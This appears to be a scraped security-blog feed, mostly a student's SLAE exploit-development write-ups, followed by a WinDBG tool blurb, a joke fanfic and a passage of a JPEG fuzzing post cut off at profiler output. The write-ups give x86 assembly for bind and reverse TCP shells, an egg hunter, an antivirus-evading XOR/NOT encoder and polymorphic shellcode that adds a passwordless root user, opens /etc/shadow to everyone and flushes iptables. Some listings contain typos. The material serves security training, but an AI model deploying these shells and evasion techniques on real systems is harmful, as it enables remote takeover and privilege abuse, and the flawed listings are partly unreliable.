Normal view

There are new articles available, click to refresh the page.
Before yesterdayWindows Exploitation

Bind TCP Shell

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517

Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #1 - Create a Shell_BIND_TCP Shellcode

    - Binds to a port
    - Execs Shell on incoming connection
    - Port number should be easily configurable


~~~~~~~~~//*****//~~~~~~~~~



Creating a BIND_TCP shell can be broken down into 4 functions.

0x1 socket
0x2 connect
0x3 execve
0x4 accept
0x5 execve


... let us begin


0x1 - socket

First, we create a socket. socket() requires 3 arguments: domain, type, protocol as seen below.


domain = AF_INET or 0x2


type = SOCK_STREAM or 0x1


protocol = TCP or 0x6


We will also be using this net.h file when we invoke the syscalls which are the networking handling part of the kernel.



We push the following values in reverse order since the stack is accessed as Last-In-First-Out (LIFO)

               push 0x6
               push 0x1
               push 0x2

Once the socket has been created, we then invoke the socketcall() syscall



             xor eax, eax              ;remove x00/NULL byte
             mov al, 0x66             ;syscall 102 (x66) for socketcall
             xor ebx, ebx             ;remove x00/NULL byte
             mov bl, 0x1              ;net.h SYS_SOCKET 1 (0x1)
             xor ecx, ecx             ;remove x00/NULL byte
            mov ecx, esp             ;arg 2, esp address to ecx
            int 0x80                    ;interrupt/excute

            mov edi, eax             ;sockfd, this will be referenced throughout the 

0x2 -bind

One common concept in SLAE course is the use of JMP-CALL-POP which allows a way to dynamically access addresses. This is because if a call instruction is used, the next instruction is automatically loaded into the stack.



          bind:
                jmp short port_to_blind        

         call_bind:
               pop esi                  ; pops ESP addr
              xor eax, eax          ;remove x00/NULL byte
              push eax               ;push eax NULL value to the stack
              push word[esi]     ;push actual port number to the stac, word=2 bytes
              mov al, 0x2          ;AF_INET IPv4
              push ax
              mov edx, esp        ;store stack addr (struct sockaddr)
              push 0x10            ;store length addr on stack
              push edx              ;push strct sockaddr to the stack
              push edi               ;sockfd from the eax _start
              xor eax, eax         ;remove x00/NULL byte
              mov al, 0x66        ;syscall 102 for socketcall
              mov bl, 0x02        ;net.h SYS_BIND 2 (0x02)
              mov ecx, esp        ;arg for SYS_BIND
              int 0x80               ;interrupt/execute

         port_to_bind:
              call call_bind
              port_number dw 0x5d11  ;port 4445 (0x115d)
                                                        ;this gets pushed to the stack after the call instruction

0x3 - listen


The listen() syscall is pretty straightforward.


            push 0x1                         ; int backlog
            push edi                          ; sockfd from eax _start
           xor eax, eax                    ;remove x00/NULL byte
           mov al, 0x66                   ;syscall 102 for socketcal
           xor ebx, ebx                    ;remove x00/NULL byte
          mov bl, 0x4                      ;net.h SYS_LISTEN 4
          xor ecx, ecx                     ;remove x00/NULL byte
          mov ecx, esp                    ;arg for SYS_LISTEN
          int 0x80                           ;interrupt/execute

0x4 - accept

Likewise, accept() is pretty straight forward.



             xor ear, eax                  ;remove x00/NULL byte
             push eax                       ;push NULL value to addrlen
             xor ebx, ebx                 ;remove x00/NULL byte
            push ebx                       ;push NULL value to addr
            push edi                        ;sockfd from eax _start
            mov al, 0x66                 ;syscall 102 for socketcall
            mov bl, 0x5                   ;net.h SYS_ACCEPT 5
            xor ecx, ecx                  ;remove x00/NULL byte
            mov ecx, esp                 ;arg for SYS_ACCEPT
            int 0x80                         ;interrupt/execute

0x4a - change_fd


This is all the dup2() functions which ensure file /bin/sh goes through the socket connection

       
            mov ebx, eax                  ;moves fd from accept to ebx
            xor ecx, ecx                    ;removes 0x00/NULL byte, 0 (std in)
            xor eax, eax                   ;removes 0x00/NULL byte
            mov al, 0x3f                  ;syscall 63 for dup2
            int 0x80                         ;interrupt/execute

            mov al,0x3f                   ;syscall 63 for dup2
            inc ecx                           ;+1 to ecx, 1 (std out)
            int 0x80                         ;interrupt/execute

            mov al, 0x3f                  ;syscall 63 for dup2
            inc ecx                           ;+1 to ecx, 2 (std error)
            int 0x80                         ;interrupt/execute

0x5 - execve

At this point we have successfully set-up our socket() and we can establish a bind() port, listen() on incoming connections and accept() it. We are now ready to run our execve(). Once the connection is established, execve will be used to execute /bin/sh.


The following instructions are taken directly from the execve module of the SLAE course.

             xor eax, eax                 ;removes x00/NULL byte
             push eax                      ;push first null dword

             push 0x68732f2f          ;hs// 
             push 0x6e69622f          ;nib/

              mov ebx, esp              ;save stack pointer in ebx
             push eax                       ; push null byte as 'null byte terminator'
             mov edx, esp               ;moves address of 0x00hs//nib/ into ecx

             push ebx
             mov exc, esp

             mov al, 0xb                 ; syscall 11 for execve
             int 0x80


And we are done!

Testing our bind shell.

We compile nasm file and execute it.



Then using another machine (Kali), I connect to the ubuntu which spawns /bin/sh shell and we can run commands remotely.

BT IP: 192.168.199.128
Ubuntu IP: 192.168.199.129


We can also run the netstat command in the ubuntu machine to verify the established connection between the BT and Ubuntu machines:

Success..we can see the connection established.


Finally, we use objdump to obtain the shellcode from our executable


***Note the last 2 bytes of the shellcode is the port to bind on. Keeping in mind little-endian structure. We should be able to just change the last 2 bytes of the shellcode to configure a different port to bind on.

Here's an example of using the shellcode with a .c program




We compile shellcode.c, execute it and connect to 4445 from out BT machine.



SUCCESS!






SLAE Certification

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

~~~~~~~~~//*****//~~~~~~~~~

I started my offsec journey back in Feb 2007 when I registered for Offensive Security Certified Professional (OSCP) and completed the certification in June of that same year. Almost 3 years later, I finally decided to start on Offensive Security Certified Expert (OSCE) and one of the baseline requirements for this certification is a familiarity with Linux assembly language. Several OSCE preparation/exam reviews pointed to Security Tubes Linux Assembly (SLAE-32 bit) course as a good course to prepare for OSCE. The course is provided at an affordable price of $130 and the certification is really unique. After completing the course, students are required to complete seven assignments (listed below) to obtain the certification.

SLAE Assignment #1 - Bind TCP Shell
SLAE Assignment #2 - Reverse TCP Shell
SLAE Assignment #3 - Egg Hunter
SLAE Assignment #4 - Encoder
SLAE Assignment #5 - Shellcode Analysis
SLAE Assignment #6 - Polymorphism
SLAE Assignment #7 - Crypter 

Shout out to Vivek for doing an amazing job teaching the course. It was a perfect blend of the crawl, walk, run--from learning the basics of assembly registers to operations/conditions/controls/loops, creating shellcodes, and finally creating encoders/polymorphism/crypters. 

Reverse TCP Shell

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #2 - Create a Shell_Reverse_TCP shellcode
      

      - Reverse connects to configured IP and Port
      - Execs shell on successful connection
      - IP and Port should be easily configurable

~~~~~~~~~~//*****//~~~~~~~~~~


Creating a REVERSE_TCP shell consist of 3 functions

0x1 socket
0x2 connect
0x3 execve



0x1 - socket

Similar to assignment #1, the first thing we need to do is set-up our socket. This can be accomplished by pushing the following parameters into the stack.

We push the following values in reverse order since the stack is accessed as Last-In-First-Out (LIFO)

                push 0x6                ;TCP or 0x6
               push 0x1               ;SOCK_STREAM or 0x1
              push 0x2               ;AF_INET or 0x2

We can then invoke the socketcall() system call, as shown below:

               xor eax, eax            ;remove x00/NULL byte
               mov al, 0x66            ;syscall 102 for socketcall
               xor ebx, ebx            ;remove x00/NULL byte
               mov bl, 0x1             ;net.h SYS_SOCKET 1 (0x1)
               xor ecx, ecx            ;remove x00/NULL byte
              mov ecx, esp            ;arg to SYS_SOCKET
              int 0x80                ;interrupt/execute


              mov edi, eax            ;sockfd, store return value of eax into edi


0x2 - connect

Once our socket is set-up, the next step is to invoke the connect() system call. This will be used to connect back to the listening machine, through the socket using an IP address and Port destination.

Below shows what we need for the connect():



One main difference with reverse shell vs. a bind shell is that we need both the IP and port of the listening machine for the reverse shell. Specifically, we use 192.168.199.128 and port 4445 as the IP and port respectively. We load both the IP and port address into the stack using jmp-pop-call method again. We first do a jmp to the label that contains our IP and port. '192.168.199.1304445' is then loaded to the stack once the call command is called. We can then call the pop esi instruction which loads the '192.168.199.1304445' into the esi register. Finally, to split the IP and port we do a push dword[esi] which pushes the first 4 bytes (192.168.199.130) and then a push word[esi +4] which pushes the last two bytes (4445).

We then call the socketcall() and SYS_CONNECT.


   reverse_jump:

        jmp short reverse_ip_port


    connect:

        ;int connect(int sockfd, const struct sockaddr *addr, socklen_t addrlen$


        pop esi                            ;pops port+IP (total of 6 bytes), ESP addr to e$
        xor eax, eax                    ;removes x00/NULL byte
        xor ecx, ecx                     ;removes x00/NULL byte
        push dword[esi]              ;push IP (first 4 bytes of esi)
        push word[esi +4]           ;push PORT (last 2 bytes of esi)
        mov al, 0x2                      ;AF_INET IPV4
        push ax
        mov eax, esp                    ;store stack address into edc (struct sockaddr)
        push 0x10                        ;store length addr on stack
        push eax                          ;push struct sockaddr to the stack
        push edi                           ;sockfd from th eax _start
        xor eax, eax                     ;removes x00/NULL byte
        mov al, 0x66                    ;syscall 102 for socketcall
        xor ebx, ebx                     ;removes x00/NULL byte
        mov bl, 0x03                    ;net.h SYS_CONNECT 3
        mov ecx, esp                    ;arg for SYS_CONNECT
        int 0x80



    reverse_ip_port:

        call connect

        reverse_ip dd 0x82c7a8c0       ;192.168.199.130, hex in little endian
        reverse_port dw 0x5d11          ;port 4445, hex in little endian



0x3 - execve

Before execve() syscall can be invoked, we have to set up dup2() calls to ensure all the std in/out/error goes through the socket. We use the same technique utilized in assignment #1.

   change_fd:

        ;multiple dup2() to ensure that stdin, stdout, std error will
        ;go through the socket connection

        xor ecx, ecx            ;removes 0x00/NULL byte, 0 (std in)
        xor eax, eax            ;removes 0x00/NULL byte
        xor ebx, ebx            ;removes 0x00/NULL byte
        mov ebx, edi            ;sockfd from the eax _start
        mov al, 0x3f            ;syscall 63 for dup2
        int 0x80                ;interrupt/execute

        mov al, 0x3f            ;syscall 63 for dup2
        inc ecx                 ;+1 to cx, 1 (std out)
        int 0x80                ;interrupt/execute

        mov al, 0x3f            ;syscall 63 for dup2
        inc ecx                 ;+1 to ecx, 2 (std error)
        int 0x80                ;interrupt/execute


Shell time! Shells for everyone!

This is no different than assignment #1 shell. We use execve() syscall to invoke a /bin/sh, however this time it sends the file std in/out back to the listening machine.

  execve:
         xor eax, eax             ;removes x00/NULL byte
         push eax                   ;push first null dword

         push 0x68732f2f      ;hs//
         push 0x6e69622f      ;nib/

         mov ebx, esp             ;save stack pointer in ebx

         push eax                    ;push null byte terminator
         mov edx, esp             ;moves address of 0x00hs//nib/ into edx

         push ebx                    
         mov ecx, esp          

         mov al, 0xb                ;syscall 11 for execve
         int 0x80


Testing our reverse shell

First, we start with compiling our nasm file into executable and then opening up a listener in our Kali box.




Execute the file and we get a reverse TCP connection back to our kali


SUCCESS...our reverse shell works.


We then use objdump to get our actual shellcode...


Copy the shellcode into our c file, test reverse shell again and we get another successful reverse shell to the kali listener.








Egg Hunter

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #3 - Egghunter
        

          - Create a working demo of the egg hunter

~~~~~~~~~//*****//~~~~~~~~~


For the 3rd assignment, I will be creating an 'egg hunter' shellcode. This wasn't covered in the SLAE course. As mentioned by a lot of SLAE blogs, a good source is from skape research paper. My shellcode did not deviate too much from what skape has shown. I created some labels to make it more readable and easier to follow the flow of instructions.

What is an egg_hunter? Why do we need it?

An egg hunter is a shellcode that points to another shellcode. It is basically a staged shellcode where the egg hunter shellcode is stage one while the actual shellcode that spawns the shell (reverse, bind, meterpreter, etc) is stage two. It is needed during an exploit development (i.e. buffer overflow) where the application only allows a small space for a shellcode--too small for the stage two shellcode, however it has enough address space for stage one.

This is accomplished by using an 'egg(s)' which is a unique 8-byte opcode (or hex). The egg gets loaded into both the stage 1 and stage 2 shellcodes. When stage one shellcode executes, it searches for the unique 8-byte egg and transfers execution control (stage 2).

Here I globally defined egg with the following and then initialized eax, ebx, ecx, edx registers:

       %define _EGG                    0x50905090

       xor ebx, ebx                         ;remove x00/NULL byte
       mov ebx  _EGG                   ;move 0x50905090 egg into ebx register
       xor ecx, ecx                         ;remove x00/NULL byte  
       mul ecx                                ;intializes eax, ecx, edx with x000000000 value


We are now ready to do some system calls. According to skape, two system calls can be used: access() and sigaction(). For this write-up, I will only be using access().


We will be using the *pathname pointer argument to validate the address that will contain our egg.

 I globally defined two more variables: the access() syscall and EFAULT

      %define _SYSCALL_ERR       ;0xf2
      %define __NR_access              ;0x21

...and created two labels: NEXT_PAGEFILE and NEXT_ADDRESS

The first label is used to switch to the next page if an invalid address memory is returned with the syscall...each pagefile/PAGESIZE contains 4096 bytes. This is accomplished using an OR instruction

NEXT_PAGEFILE:

      or dx, 0xfff                                 ;note that edx is the pointed *pathname
                                                         ;0xffff == 4095

The second label will be our meat and potatoes. Within this label or procedure, we will be calling the access(2) syscall, compare the results (egg hunting), and loop through the address space.

NEXT_ADDRESS:

        inc edx                               ;increments edx, checks next address if it contains the egg
        pusha                                 ;push eax, ebx, ecx, edx....these registers are used multiple 
                                                   ;pushing them to the stack to preserve values when popped
        lea ebx, [edx +4]
        xor eax, eax                      ;remove x00/NULL byte
        mov al, __NR_access       ;syscall 33 for access(2)
        int 0x80                            ;interrupt/execute

        ;egg hunting begins

        cmp al, SYSCALL_ERR ;compares return value of al to 0xf2 (EFAULT)
        popa                                 ;branch, pop eax, ebx, ecx, edx
        jz NEXT_PAGEFILE     ;al return value == EFAULT value, invalid address memory
                                                 ;move to the next PAGESIZE

        cmp [edx], ebx                 ;if al retun value != EFAULT value, execute this instruction
                                                 ;compares the egg with edx value
        jnz NEXT_ADDRESS    ;not EFAULT but _EGG not found, loop again


        cmp[edx +4], ebx             ;_EGG found, test for the next 4 byte of the _EGG
       jnz NEXT_ADDRESS     ;if next 4 bytes of edx value !=_EGG, loop again

       jmp edx                             ;finally, 8 bytes of _EGG found, jmp to address of edx     

We compile our nasm file and obtain our shellcode using objdump.


We now have our stage one shellcode and for the stage two shellcode, I will be using the reverse TCP shellcode from SLAE Assignment #2.

I updated the shellcode.c file to include both stage one and stage two shellcodes as seen below.



For testing, I am using my kali box again to receive the reverse TCP shell. We compile our shellcode.c, open a listener in Kali and run the exploit.



SUCCESS!!



Shellcode Encoder

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #4 - Encoder
 - Create a custom encoding scheme


~~~~~~~~~//*****//~~~~~~~~~



For this assignment,  we will be encoding an execve shellcode that spawns a /bins/sh using XOR and then NOT encoding The idea behind encoding is that we can alter opcodes without altering its functionality. For instance, using the shellcode below, it is pretty clear that our shellcode contains \x2f\x2f\x73\x68\x2f\x62\x69\x6e which translates to //bin/sh. Among other things, this is something that could be easily caught by Anti-virus (AV) or Intrusion  Detection System (IDS).

Below is the original execve-stack.nasm file and its corresponding opcodes/shellcode.






Once we get the original shellcode...I used python for encoding which will be a two-step process: XOR encoding first, then NOT encoding the result of the first step.

Here we initialize it with our original shellcode from execve-stack.nasm file:


The first step is the  XOR encoding. For this step, I am going through each byte of the original shellcode and XOR'ng it with 0xaa.


The second step is to encode each byte of the result from XOR encoding, with a NOT encoding.




Below is the output of the encoder python script. I am printing both XOR and NOT encoded shellcodes however, we will only need the NOT encoded shellcode for our decoder.



With the 'XOR then NOT' encoded shellcode, we are now ready to create our decoder to revert or decode it back to the original shellcode.

For this step, I am using the jmp-pop-call method again. We load the encoded shellcode into the stack by using the call instruction. We then pop it and load it into a register (esi for this one). We can then loop through each byte of the encoded shellcode loaded in esi. 

We first do a NOT then followed by XOR 0xaa.

Below shows the encoding and decoding scheme for the first byte

encoding: 0x31---> 0x9b (0x31 XOR 0xaa) -----> 0x64 (NOT 0x9b & 0xff)
decoding: 0x64---> 09xb (NOT 0x64 & 0xff) ---> 0x31 (0x9b XOR 0xaa)

...and here's the complete nasm file with our decoder.



We compile then generate a new shellcode using objdump.


We update our shellcode.c file, compile it and execute.

Note that with this the new shellcode, it shows that we can 'hide' the //bin/sh while maintaining the functionality.


SUCCESS!


Shellcode Analysis

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
Github: https://github.com/pyt3ra/SLAE-Certification.git

SLAE Assignment #5 - Analysis of Linux/x86 msfpayload shellcodes

          - Use GDB/ndisasm/libemu to dissect the functionality of the shellcode


~~~~~~~~~//*****//~~~~~~~~~


For this assignment, I will be using the first three Linux/x86 payloads generated by msfvenom (formerly msfpayload)


0x1 - linux/x86/adduser


A quick ndisasm gives us the following:

msfvenom -p linux/x86/adduser -f raw | ndisasm-u -



The first obvious ones are the 4-dwords:

           push dword 0x64777373
           push dword 0x61702f2f
           push dword 0x6374652f

The following dwords (in little-endian) are the hex representation of /etc//passwd as shown below:


However, it is still unclear as to what is being done to the /etc//passwd file. I think this is where we can use gdb to see what system calls are being invoked.

I generated the shellcode from msfvenom, loaded it in shellcode.c, compiled and loaded in gdb.




Once loaded in gdb...we first set a breakpoint for shellcode: break *&code 



We can see again the /etc//passwd in lines +15, +20, +25. We can also see several int 0x80 (lines +7, +35, +86, +91) for the system calls. We can add breakpoints on these lines to see what system calls are loaded into eax. 


Note: Here is a list of all the system calls with their corresponding call numbers found in /usr/include/i86-linux-gnu/asm/unistd_32.h


Syscall #1:  eax has 46 or setgid() loaded to it.



setgid() call is pretty straight forward. This call sets a user's group id. In this case, the group id is set to 0 as seen in the first two lines. The function calls only require one argument, in this case 0 is loaded into ebx (mov ebx, ecx) as the argument. 

                                                  root@kali:~/SLAE# id
uid=0(root) gid=0(root) groups=0(root)



                   
Syscall #2: eax has 5 or open() loaded to it.


open() here opens /etc/passwd file for the pathname and sets the flags to O_RDWR (Read/Write). This step will require root access hence why setgid()  was called first and set the user's group id to 0.

                      
                             push   0x64777373
                             push   0x61702f2f
                             push   0x6374652f




Syscall #3: eax has 4 or write() loaded to it.


write() has 3 arguments (fd, *buf, count). count writes up to count bytes from the buffer pointed buf to the file referred to by the file descriptor fd.



The following is what gets written in to /etc/passwd file.
USER=test
PASS=password (in this case it is hashed)
SHELL=/bin/bash



syscall #4: eax has 1 or exit() loaded to it....enough said.




0x2 - linux/x86/chmod

We again generate a shellcode with the following options:

FILE=/home/slae/test.txt
MODE=0777





Compile and we load the file in gdb.


We put a breakpoint at the system  call @ +37 (0x804a065)

Syscall: eax has 15 or chmod() loaded to it.



chmod() requires two arguments: pathname and mode

pathname: /home/slae/test.txt (ebx)



mode: 0777 (ecx) 

Here we can see 0x1ff (0777) pushed to the stack and popped into ecx


0x3 - linux/x86/exec

We generate a shellcode with the following option:

CMD=ifconfig



Compile and load it in gdb


We put a breakpoint at the system call @ +42 (0x0804a06a)

syscall: eax has 11 or execve() loaded to it.



Here we see the first part of the string for the command /bin/sh -c loaded into ebx.





The next string should be ifconfig, however, I couldn't find it using gdb. I ended up using ndisasm for this next step.

 
Call dword 0x26 is what we are looking for. Looking at 1D to 24, we can see that these are the opcodes for ifconfig. 


Furthermore, plugging the next opcodes (26 through 29) shows how the entire command string (/bin/sh -c ifconfig) is pushed into the stack (esp), and loaded into ecx




Thank you for reading.

Shellcode Polymorphism

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:

http:/securitytube-training.com/online-courses/securitytube-linux-assembly-expert

Student ID: SLAE-1517
GitHub:

SLAE Assignment #6 - Polymorphic
     - Create a polymorphic version of 3 shellcodes from Shell-Storm
     - The polymorphic versions cannot be larger than 150% of the existing shellcode
     - Bonus: points for making it shorter in length than original



~~~~~~~~~//*****//~~~~~~~~~


0x1 - add root user (r00t) with no password to /etc/passwd
link: www.shell-storm.org/shellcode/files/shellcode-211.php

Original shellcode, assembled using ndisasm



For this, we can focus on lines 6, B, 15 and 25, 2A, 2F. The following instructions correspond to the two syscalls: open() and write (). The open() opens /etc//passwd and write() writes r00t::0:0::: I was able to change the values by running add and sub operations. I could have changed r00t::0:0::: as well using XOR operations or getting rid of the push (replaced with mov)  instructions, however, I would have exceeded the 150% of shellcode size limit.





0x2 - chmod (etc/shadow, 0777)
link: www.shell-storm.org/shellcode/files/shellcode-593.php

Here's the original shellcode with the size of 29 bytes disassembled using ndisasm. Similar to 0x1, lines 3, 8, and D show the file name /etc//shadow which means this will be the focus with the polymorphism process. Line 14 shows the permission 0777 which could also be polymorphed using some add or sub instructions but I didn't do it base on the %150 shellcode size requirement.



For the polymorphism, I used a combination of similar technique from 0x1 plus a JMP-CALL-POP technique. I subtracted 0x11111111 from each dword and then dynamically loaded the new values to the stack. After they are popped, I added 0x11111111 to recover the original value before they pushed back into the stack again. The size of the new shellcode is 44 bytes.


0x3 -iptables -F
link: www.shell-storm.org/shellcode/files/shellcode-368.php


The following instructions results: /sbin/iptables -F which then get executed using execve()




I used the JMP-CALL-POP method to change it up. Basically the /sbin/iptables -F hex codes from above are replaced. The new shellcode size is 58 bytes.


Thank you for reading.

heappo: a WinDBG extension for heap tracing

24 March 2020 at 00:00
Preface During these days of forced quarantine time-off, I have been reviewing notes and exercises from the outstanding Corelan Advanced training I took last October at Brucon, and so I decided to work on some tooling I had in mind lately. The idea came from thisresearch by Sam Brown from F-Secure: after testing the tool I decided to port it to the latest PyKD version to support both Python3 and Python2, and can run on both x86 and x64 (tested on latest Win10 1909) I aptly named this effort Heappo and here some of its key-features and enhancements.

Taking a joke a little too far.

By: tiraniddo
1 April 2020 at 11:00

Extract from “Rainbow Dash and the Open Plan Office”.

This is an extract from my upcoming 29 chapter My Little Pony fanfic. Clearly I do not own the rights to the characters etc.

Dash was tapping away on the only thing a pony could ever love, the Das Keyboard with rainbow colored LED Cherry Blues. Dash is nothing if not on brand when it comes to illumination. It had been bought in a pique of distain for equine kind, a real low point in what Dash liked to call, annus mirabilis. It was clear Dash liked to sound smart but had skipped Latin lessons at school.

Applejack tried to remain oblivious to the click-clacking coming from the next desk over. But even with the comically over-sized noise cancelling headphones, more akin to ear defenders than something to listen to music with, it all got too much.

“Hey, Dash, did you really have to buy such a noisy keyboard?”, Applejack queried with a tinge of anger. “Very much so, it allows my creativity to flow. Real professionals need real tools. You can’t be a real professional with some inferior Cherry Reds.”, Dash shot back. “Well, if your profession is shit posting on Reddit that might be true, but you’ve only committed 10 lines of code in the past week.”. This elicited an indignant response from Dash, “I spend my time meticulously crafting dulcet prose. Only when it’s ready do I commit my 1000-line object d’art to a change request for reading by mere mortals like yourself.”.

Letting out a groan of frustration Applejack went back to staring at the monitor to wonder why the borrow checker was throwing errors again. The job was only to make ends meet until the debt on the farm could be repaid after the “incident”. At any rate arguing wasn’t worth the time, everyone knew Dash was a favorite of the basement dwelling boss, nothing that pony could do would really lead to anything close to a satisfactory defenestration.

“Have you ever wondered how everyone on the internet is so stupid?”, Dash opined, almost to nopony in particular. Applejack, clearly seeing an in, retorted “Well George Carlin is quoted as saying “Think of how stupid the average person is, and realize half of them are stupider than that.”, it’s clear where the dividing line exists in this office”. “I think if George had the chance to use Twitter he might have revised the calculations a bit” Dash quipped either ignoring the barb or perhaps missing it entirely.

To be continued… not.

Fuzzing Like A Caveman 2: Improving Performance

By: h0mbre
8 April 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’ we’ll just be looking at improving the performance of our previous fuzzer. This means there won’t be any wholesale changes, we’re simply looking to improve upon what we already had in the previous post. This means we’ll still end up walking away from this blogpost with a very basic mutation fuzzer (please let it be faster!!) and hopefully some more bugs on a different target. We won’t really tinker with multi-threading or multi-processing in this post, we will save that for subsequent fuzzing posts.

I feel the need to add a DISCLAIMER here that I am not a professional developer, far from it. I’m simply not experienced enough with programming at this point to recognize opportunities to improve performance the way a more seasoned programmer would. I’m going to use my crude skillset and my limited knowledge of programming to improve our previous fuzzer, that’s it. The code produced will not be pretty, it will not be perfect, but it will be better than what we had in the previous post. It should also be mentioned that all testing was done on VMWare Workstation on an x86 Kali VM with 1 CPU and 1 Core.

Let’s take a moment to define ‘better’ in the context of this blog post as well. What I mean by ‘better’ here is that we can iterate through n fuzzing iterations faster, that’s it. We’ll take the time to completely rewrite the fuzzer, use a cool language, pick a hardened target, and employ more advanced fuzzing techniques at a later date. :)

Obviously, if you haven’t read the previous post you will be LOST!

Analyzing Our Fuzzer

Our last fuzzer, quite plainly, worked! We found some bugs in our target. But we knew we left some optimizations on the table when we turned in our homework. Let’s again look at the fuzzer from the last post (with minor changes for testing purposes):

#!/usr/bin/env python3

import sys
import random
from pexpect import run
from pipes import quote

# read bytes from our valid JPEG and return them in a mutable bytearray 
def get_bytes(filename):

	f = open(filename, "rb").read()

	return bytearray(f)

def bit_flip(data):

	num_of_flips = int((len(data) - 4) * .01)

	indexes = range(4, (len(data) - 4))

	chosen_indexes = []

	# iterate selecting indexes until we've hit our num_of_flips number
	counter = 0
	while counter < num_of_flips:
		chosen_indexes.append(random.choice(indexes))
		counter += 1

	for x in chosen_indexes:
		current = data[x]
		current = (bin(current).replace("0b",""))
		current = "0" * (8 - len(current)) + current
		
		indexes = range(0,8)

		picked_index = random.choice(indexes)

		new_number = []

		# our new_number list now has all the digits, example: ['1', '0', '1', '0', '1', '0', '1', '0']
		for i in current:
			new_number.append(i)

		# if the number at our randomly selected index is a 1, make it a 0, and vice versa
		if new_number[picked_index] == "1":
			new_number[picked_index] = "0"
		else:
			new_number[picked_index] = "1"

		# create our new binary string of our bit-flipped number
		current = ''
		for i in new_number:
			current += i

		# convert that string to an integer
		current = int(current,2)

		# change the number in our byte array to our new number we just constructed
		data[x] = current

	return data

def magic(data):

	magic_vals = [
	(1, 255),
	(1, 255),
	(1, 127),
	(1, 0),
	(2, 255),
	(2, 0),
	(4, 255),
	(4, 0),
	(4, 128),
	(4, 64),
	(4, 127)
	]

	picked_magic = random.choice(magic_vals)

	length = len(data) - 8
	index = range(0, length)
	picked_index = random.choice(index)

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (1, )
	if picked_magic[0] == 1:
		if picked_magic[1] == 255:			# 0xFF
			data[picked_index] = 255
		elif picked_magic[1] == 127:		# 0x7F
			data[picked_index] = 127
		elif picked_magic[1] == 0:			# 0x00
			data[picked_index] = 0

	# here we are hardcoding all the byte overwrites for all of the tuples that begin (2, )
	elif picked_magic[0] == 2:
		if picked_magic[1] == 255:			# 0xFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
		elif picked_magic[1] == 0:			# 0x0000
			data[picked_index] = 0
			data[picked_index + 1] = 0

	# here we are hardcoding all of the byte overwrites for all of the tuples that being (4, )
	elif picked_magic[0] == 4:
		if picked_magic[1] == 255:			# 0xFFFFFFFF
			data[picked_index] = 255
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		elif picked_magic[1] == 0:			# 0x00000000
			data[picked_index] = 0
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 128:		# 0x80000000
			data[picked_index] = 128
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 64:			# 0x40000000
			data[picked_index] = 64
			data[picked_index + 1] = 0
			data[picked_index + 2] = 0
			data[picked_index + 3] = 0
		elif picked_magic[1] == 127:		# 0x7FFFFFFF
			data[picked_index] = 127
			data[picked_index + 1] = 255
			data[picked_index + 2] = 255
			data[picked_index + 3] = 255
		
	return data

# create new jpg with mutated data
def create_new(data):

	f = open("mutated.jpg", "wb+")
	f.write(data)
	f.close()

def exif(counter,data):

    command = "exif mutated.jpg -verbose"

    out, returncode = run("sh -c " + quote(command), withexitstatus=1)

    if b"Segmentation" in out:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    #if counter % 100 == 0:
    #	print(counter, end="\r")

if len(sys.argv) < 2:
	print("Usage: JPEGfuzz.py <valid_jpg>")

else:
	filename = sys.argv[1]
	counter = 0
	while counter < 1000:
		data = get_bytes(filename)
		functions = [0, 1]
		picked_function = random.choice(functions)
		picked_function = 1
		if picked_function == 0:
			mutated = magic(data)
			create_new(mutated)
			exif(counter,mutated)
		else:
			mutated = bit_flip(data)
			create_new(mutated)
			exif(counter,mutated)

		counter += 1

You may notice a few changes. We’ve:

  • commented out the print statement for the iterations counter every 100 iterations,
  • added print statements to notify us of any Segfaults,
  • hardcoded 1k iterations,
  • added this line: picked_function = 1 temporarily so that we eliminate any randomness in our testing and we only stick to one mutation method (bit_flip())

Let’s run this version of our fuzzer with some profiling instrumentation and we can really analyze how much time we spend where in our program’s execution.

We can make use of the cProfile Python module and see where we spend our time during 1,000 fuzzing iterations. The program takes a filepath argument to a valid JPEG file if you remember, so our complete command line syntax will be: python3 -m cProfile -s cumtime JPEGfuzzer.py ~/jpegs/Canon_40D.jpg.

It should also be noted that adding this cProfile instrumentation could slow down performance. I tested without it and for the iteration sizes we use in this post, it didn’t seem to make a significant difference.

After letting this run, we see our program output and we get to see where we spent the most time during execution.

2476093 function calls (2474812 primitive calls) in 122.084 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     33/1    0.000    0.000  122.084  122.084 {built-in method builtins.exec}
        1    0.108    0.108  122.084  122.084 blog.py:3(<module>)
     1000    0.090    0.000  118.622    0.119 blog.py:140(exif)
     1000    0.080    0.000  118.452    0.118 run.py:7(run)
     5432  103.761    0.019  103.761    0.019 {built-in method time.sleep}
